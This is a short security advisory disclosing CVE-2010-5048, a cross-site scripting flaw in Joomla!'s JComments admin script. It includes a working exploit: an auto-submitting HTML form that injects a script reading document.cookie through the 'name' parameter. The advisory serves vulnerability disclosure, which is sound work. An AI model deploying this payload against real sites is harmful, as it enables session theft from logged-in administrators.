High-Tech Bridge SA Security Research Lab has discovered vulnerability in JComments component for Joomla! which could be exploited to perform cross-site scripting (XSS) attacks.
- Cross-site scripting vulnerability in JComments: CVE-2010-5048
The vulnerability exists due to input sanitation error in the HTTP POST parameter “name” in admin.jcomments.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged in into the website and has access to the vulnerable script.
Exploitation example:
<form method=“POST” action=“http://host/administrator/index.php” name=“main”>
<input type=“hidden” name=“name” value=‘ComntrName"><script>alert(document.cookie)</script>’>
<input type=“hidden” name=“email” value="[email protected]">
<input type=“hidden” name=“comment” value=“comment text”>
<input type=“hidden” name=“published” value=“1”>
<input type=“hidden” name=“option” value=“com_jcomments”>
<input type=“hidden” name=“id” value=“1”>
<input type=“hidden” name=“task” value=“save”>
</form>
<script>
document.main.submit();
</script>